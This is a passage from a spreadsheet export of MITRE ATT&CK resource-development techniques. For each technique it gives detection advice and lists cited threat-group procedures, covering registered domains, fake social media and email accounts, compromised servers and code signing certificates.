[Kimsuky](https://attack.mitre.org/groups/G0094) has registered domains to spoof targeted organizations and trusted third parties.(Citation: ThreatConnect Kimsuky September 2020)(Citation: Zdnet Kimsuky Group September 2020)(Citation: CISA AA20-301A Kimsuky)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has acquired domains related to their campaigns to act as distribution points and C2 channels.(Citation: CISA AppleJeus Feb 2021)(Citation: Google TAG Lazarus Jan 2021)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used dynamic DNS providers to create legitimate-looking subdomains for C2.(Citation: MalwareBytes LazyScripter Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has established domains that impersonate legitimate entities to use for targeting efforts. (Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has registered fraudulent domains such as "mail-newyorker.com" and "news12.com.recover-session-service.site" to target specific victims with phishing attacks.(Citation: Certfa Charming Kitten January 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) have acquired C2 domains prior to operations.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: McAfee Dianxun March 2021)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has registered domain names and created URLs that are often designed to mimic or spoof legitimate websites, such as email login pages, online file sharing and storage websites, and password reset pages.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has acquired domains to establish credential harvesting pages, often spoofing the target organization and using free top level domains .TK, .ML, .GA, .CF, and .GQ.(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Secureworks COBALT DICKENS August 2018)(Citation: Proofpoint TA407 September 2019)(Citation: Secureworks COBALT DICKENS September 2019)(Citation: Malwarebytes Silent Librarian October 2020)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has registered domains often containing the keywords “kimjoy,” “h0pe,” and “grace,” using domain registrars including Netdorm and No-IP DDNS, and hosting providers including xTom GmbH and Danilenko, Artyom.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has registered domains to impersonate services such as Dropbox to distribute malware.(Citation: Korean FSI TA505 2020)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has obtained domains to host their payloads.(Citation: Palo Alto Black-T October 2020)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has registered domains for C2.(Citation: Lunghi Iron Tiger Linux)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has registered domains to mimic file sharing, government, defense, and research websites for use in targeted campaigns.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Talos Transparent Tribe May 2021)
Winnti Group
[Winnti Group](https://attack.mitre.org/groups/G0044) has registered domains for C2 that mimicked sites of their intended targets.(Citation: Kaspersky Winnti April 2013)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has purchased domains for use in targeted campaigns.(Citation: Microsoft Targeting Elections September 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has registered malicious domains for use in intrusion campaigns.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Once adversaries leverage serverless functions as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle. 
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Active DNS
Monitor for queried domain name system (DNS) registry data that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Domain Registration
Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Passive DNS
Monitor for logged domain name system (DNS) data that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Response Content
Once adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Response Metadata
Monitor for contextual data about an Internet-facing resource gathered from a scan, such as running services or ports that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
</t>
  </si>
  <si>
    <t xml:space="preserve">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Social Media
Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Operation Dream Job
For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) created fake LinkedIn accounts for their targeting efforts.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)
Operation Ghost
For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) registered Twitter accounts to host C2 nodes.(Citation: ESET Dukes October 2019)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has set up Facebook pages in tandem with fake websites.(Citation: Volexity Ocean Lotus November 2020)
CURIUM
[CURIUM](https://attack.mitre.org/groups/G1012) has established a network of fictitious social media accounts, including on Facebook and LinkedIn, to establish relationships with victims, often posing as an attractive woman.(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Cleaver
[Cleaver](https://attack.mitre.org/groups/G0003) has created fake LinkedIn profiles that included profile photos, details, and connections.(Citation: Dell Threat Group 2889)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has established social media profiles to mimic employees of targeted companies.(Citation: Google EXOTIC LILY March 2022)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used a Twitter account to communicate with ransomware victims.(Citation: ClearSky Pay2Kitten December 2020)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers.(Citation: ClearSky Siamesekitten August 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has created social media accounts to monitor news and security trends as well as potential targets.(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has created new Twitter accounts to conduct social engineering against potential victims.(Citation: Google TAG Lazarus Jan 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has created new social media accounts for targeting efforts.(Citation: CISA AA21-200A APT40 July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has created fake LinkedIn and other social media accounts to contact targets and convince them--through messages and voice communications--to open malicious links.(Citation: ClearSky Kittens Back 3 August 2020)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has established social media accounts to disseminate victim internal-only documents and other sensitive data.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
FunnyDream
For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors likely established an identified email account to register a variety of domains that were used during the campaign.(Citation: Bitdefender FunnyDream Campaign November 2020)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) created fake email accounts to correspond with fake LinkedIn personas; [Lazarus Group](https://attack.mitre.org/groups/G0032) also established email accounts to match those of the victim as part of their BEC attempt.(Citation: ESET Lazarus Jun 2020)
Operation Dust Storm
For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors established email addresses to register domains for their operations.(Citation: Cylance Dust Storm)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), attackers created email addresses to register for a free account for a control server used for the implants.(Citation: McAfee Honeybee) 
Operation Wocao
For [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors registered email accounts to use during the campaign.(Citation: FoxIT Wocao December 2019)
APT1
[APT1](https://attack.mitre.org/groups/G0006) has created email accounts for later use in social engineering, phishing, and when registering domains.(Citation: Mandiant APT1)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has created e-mail accounts to spoof targeted organizations.(Citation: Google EXOTIC LILY March 2022)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has established email accounts for use in domain registration including for ProtonMail addresses.(Citation: Kaspersky Lyceum October 2021)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has created email accounts to communicate with their ransomware victims, to include providing payment and decryption details.(Citation: Crowdstrike Indrik November 2018)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has created email accounts for phishing operations.(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has created new email accounts for spearphishing operations.(Citation: Kaspersky ThreatNeedle Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has created new email accounts for targeting efforts.(Citation: CISA AA21-200A APT40 July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has established email accounts using fake personas for spearphishing operations.(Citation: IBM ITG18 2020)(Citation: Proofpoint TA453 March 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.(Citation: Proofpoint TA416 Europe March 2022)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has created email accounts that mimic legitimate organizations for its spearphishing operations.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has established e-mail accounts to receive e-mails forwarded from compromised accounts.(Citation: DOJ Iran Indictments March 2018)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has leveraged ProtonMail email addresses in ransom notes when delivering [Ryuk](https://attack.mitre.org/software/S0446) ransomware.(Citation: Mandiant FIN12 Oct 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">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Social Media
Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
APT17
[APT17](https://attack.mitre.org/groups/G0025) has created and cultivated profile pages in Microsoft TechNet. To make profile pages appear more legitimate, [APT17](https://attack.mitre.org/groups/G0025) has created biographical sections and posted in forum threads.(Citation: FireEye APT17)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has created KeyBase accounts to communicate with ransomware victims.(Citation: ClearSky Pay2Kitten December 2020)(Citation: Check Point Pay2Key November 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used residential proxies, including Azure Virtual Machines, to obfuscate their access to victim environments.(Citation: Mandiant APT29 Microsoft 365 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Response Metadata
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors compromised web servers to use for C2.(Citation: McAfee Night Dragon)
Operation Dream Job
For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) compromised servers to host their malicious tools.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)
Operation Sharpshooter
For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors compromised a server they used as part of the campaign's infrastructure.(Citation: Bleeping Computer Op Sharpshooter March 2019)
APT16
[APT16](https://attack.mitre.org/groups/G0023) has compromised otherwise legitimate sites as staging servers for second-stage payloads.(Citation: FireEye EPS Awakens Part 2)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised legitimate websites to host C2 and malware modules.(Citation: Gigamon Berserk Bear October 2021)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used compromised web servers as part of their operational infrastructure.(Citation: TrendMicro EarthLusca 2022)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has served fake updates via legitimate websites that have been compromised.(Citation: Crowdstrike Indrik November 2018)	
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has compromised servers to stage malicious tools.(Citation: Kaspersky ThreatNeedle Feb 2021)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used compromised servers as infrastructure.(Citation: Recorded Future Turla Infra 2020)(Citation: Accenture HyperStack October 2020)(Citation: Talos TinyTurla September 2021)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used compromised PRTG servers from other organizations for C2.(Citation: Secureworks BRONZE SILHOUETTE May 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Response Metadata
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used the VPS infrastructure of compromised Iranian threat actors.(Citation: NSA NCSC Turla OilRig)
</t>
  </si>
  <si>
    <t xml:space="preserve">Malware Metadata
Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) digitally signed their malware and the dbxcli utility.(Citation: ESET Lazarus Jun 2020)
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created self-signed certificates to sign malicious installers.(Citation: Bitdefender StrongPity June 2020)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.(Citation: Unit 42 BackConfig May 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003) , [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) , or [Malicious Link](https://attack.mitre.org/techniques/T1204/001) .
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has created a link to a Dropbox file that has been used in their spear-phishing operations.(Citation: Kaspersky LuminousMoth July 2021)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has cloned victim organization login pages and staged them for later use in credential harvesting campaigns. [Silent Librarian](https://attack.mitre.org/groups/G0122) has also made use of a variety of URL shorteners for these staged websites.(Citation: Secureworks COBALT DICKENS September 2019)(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
If infrastructure or patterns in the malicious web content related to SEO poisoning or [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) have been previously identified, internet scanning may uncover when an adversary has staged web content supporting a strategic web compromise. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has obtained exploit code for various CVEs.(Citation: KISA Operation Muzabi)
</t>
  </si>
  <si>
    <t xml:space="preserve">Malware Content
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)
Malware Metadata
Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
C0015
For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used [Cobalt Strike](https://attack.mitre.org/software/S0154) and [Conti](https://attack.mitre.org/software/S0575) ransomware.(Citation: DFIR Conti Bazar Nov 2021) 
FunnyDream
For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used a new backdoor named [FunnyDream](https://attack.mitre.org/software/S1044).(Citation: Bitdefender FunnyDream Campaign November 2020) 
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used Trojans from underground hacker websites.(Citation: McAfee Night Dragon)
Operation Spalax
For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors obtained malware, including [Remcos](https://attack.mitre.org/software/S0332), [njRAT](https://attack.mitre.org/software/S0385), and AsyncRAT.(Citation: ESET Operation Spalax Jan 2021)
APT1
[APT1](https://attack.mitre.org/groups/G0006) used publicly available malware for privilege escalation.(Citation: Mandiant APT1)
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has used a variety of publicly-available remote access Trojans (RATs) for its operations.(Citation: FSI Andariel Campaign Rifle July 2017)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has acquired and used [njRAT](https://attack.mitre.org/software/S0385) in its operations.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has obtained and used leaked malware, including DoublePulsar, EternalBlue, EternalRocks, and EternalSynergy, in its operations.(Citation: ESET BackdoorDiplomacy Jun 2021)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of malware, including [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: TrendMicro EarthLusca 2022)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) acquired and used the Redline password stealer in their operations.(Citation: MSTIC DEV-0537 Mar 2022)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used a variety of open-source remote access Trojans for its operations.(Citation: MalwareBytes LazyScripter Feb 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has obtained and used malware such as [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)
Metador
[Metador](https://attack.mitre.org/groups/G1013) has used unique malware in their operations, including [metaMain](https://attack.mitre.org/software/S1059) and [Mafalda](https://attack.mitre.org/software/S1060).(Citation: SentinelLabs Metador Sept 2022)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used multiple strains of malware available for purchase on criminal forums or in open-source repositories.(Citation: Proofpoint TA2541 February 2022)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used malware such as [Azorult](https://attack.mitre.org/software/S0344) and [Cobalt Strike](https://attack.mitre.org/software/S0154) in their operations.(Citation: NCC Group TA505)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used malware obtained after compromising other threat actors, such as [OilRig](https://attack.mitre.org/groups/G0049).(Citation: NSA NCSC Turla OilRig)(Citation: Recorded Future Turla Infra 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Sandworm Team
In 2017, [Sandworm Team](https://attack.mitre.org/groups/G0034) conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Malware Metadata
Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used code signing certificates issued by Sectigo RSA for some of its malware and tools.(Citation: ESET Lazarus Jun 2020) 
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used stolen code-signing certificates for its malicious payloads.(Citation: Symantec Palmerworm Sep 2020)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has stolen legitimate certificates to sign malicious payloads.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used an expired open-source X.509 certificate for testing in the OpenSSL repository, to connect to actor-controlled C2 servers.(Citation: Bitdefender Sardonic Aug 2021)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has obtained stolen valid certificates, including from VMProtect and the Chinese instant messaging application Youdu, for their operations.(Citation: Lunghi Iron Tiger Linux)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has obtained code signing certificates signed by DigiCert, GlobalSign, and COMOOD for malware payloads.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: Mandiant FIN12 Oct 2021)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) has used code signing certificates issued to fake companies to bypass security controls.(Citation: IBM MegaCortex)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Social Media
Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used compromised email accounts to send credential phishing emails.(Citation: Google TAG Ukraine Threat Landscape March 2022)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has compromised email accounts to further enable phishing campaigns and taken control of dormant accounts.(Citation: ANSSI Nobelium Phishing December 2021)(Citation: Mandiant APT29 Microsoft 365 2022)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used compromised accounts to send spearphishing emails.(Citation: SecureWorks August 2019)
IndigoZebra
[IndigoZebra](https://attack.mitre.org/groups/G0136) has compromised legitimate email accounts to use in their spearphishing operations.(Citation: Checkpoint IndigoZebra July 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has compromised email accounts to send spearphishing e-mails.(Citation: VirusBulletin Kimsuky October 2019)(Citation: Malwarebytes Kimsuky June 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has payed employees, suppliers, and business partners of target organizations for credentials.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has compromised email accounts to conduct social engineering attacks.(Citation: CISA AA21-200A APT40 July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has compromised personal email accounts through the use of legitimate credentials and gathered additional victim information.(Citation: IBM ITG18 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Response Metadata
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors purchased hosted services to use for C2.(Citation: McAfee Night Dragon)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) acquired servers to host their malicious tools.(Citation: ESET Lazarus Jun 2020)
Operation Honeybee
For [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), at least one identified persona was used to register for a free account for a control server.(Citation: McAfee Honeybee) 
Operation Wocao
For [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors purchased servers with Bitcoin to use during the operation.(Citation: FoxIT Wocao December 2019)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired multiple servers for some of their operations, using each server for a different role.(Citation: TrendMicro EarthLusca 2022)
GALLIUM
